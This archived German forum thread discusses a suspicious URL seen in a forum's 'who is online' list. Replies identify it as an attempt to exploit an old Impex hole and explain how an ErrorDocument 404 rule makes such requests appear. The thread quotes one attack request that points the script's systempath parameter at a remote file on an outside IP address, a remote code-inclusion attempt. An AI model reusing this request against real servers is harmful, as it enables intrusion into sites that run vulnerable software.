PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Virus im Forum?

Neuling44
16.04.2008, 20:11
Hallo,

ich hab grade bei Wer ist online das gesehen:

//impex/ImpExData.php?systempath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?

ich hab impex aber deinstalliert, was ist das? kann mir das jemand erklären?

ich bin nur sehr verwirrt

gruß und danke

sebastian

StGaensler
16.04.2008, 21:59
Hallo,

wenn du kein Impex auf dem Server hast, ist das überhaupt kein Problem, das ist einer, der eine uralte Lücke in Impex ausnützen will.

Viele Grüße,
Stefan

Onur
17.04.2008, 19:18
nur wenns weg wäre, müsste der Server einen 404 zurückgeben und keinen Eintrag in die Sessions machen, oder lieg ich da falsch??

also bersser mal nachsehen ob nicht doch noch was rumliegt

StGaensler
18.04.2008, 00:03
Korrekt, allerdings scheinst du deinen Server so konfiguriert zu haben (z.B. mit einem Eintrag in der .htaccess), dass er bei einem 404-Fehler z.B. die Startseite des Forums aufruft. Somit bekommst du die URLs in der Wer ist online-Liste angezeigt.
Wo und wie du das gemacht hast, kannst du bzw. dein Hoster dir wahrscheinlich am Besten sagen :)

Viele Grüße,
Stefan

Neuling44
18.04.2008, 20:53
Hallo,

also ich habe nachgesehen, es existiert rein gar nichts mehr von Impex. das hab ich gleich nach erfolgreichen importieren wieder entfernt.

was soll ich denn in die htaccess datei schreiben, damit automatisch zur startseite umgeleitet wird wenn die seite nicht existiert?

gruß und danke

sebastian

StGaensler
18.04.2008, 22:37
was soll ich denn in die htaccess datei schreiben, damit automatisch zur startseite umgeleitet wird wenn die seite nicht existiert?Du verstehst mich falsch, das steht bereits drinnen! Wenn du die Anzeige in der "Wer ist online"-Liste nicht willst, musst du diesen Eintrag entfernen. Er könnte z.B. folgendermaßen aussehen:ErrorDocument 404 /forum/index.php

Viele Grüße,
Stefan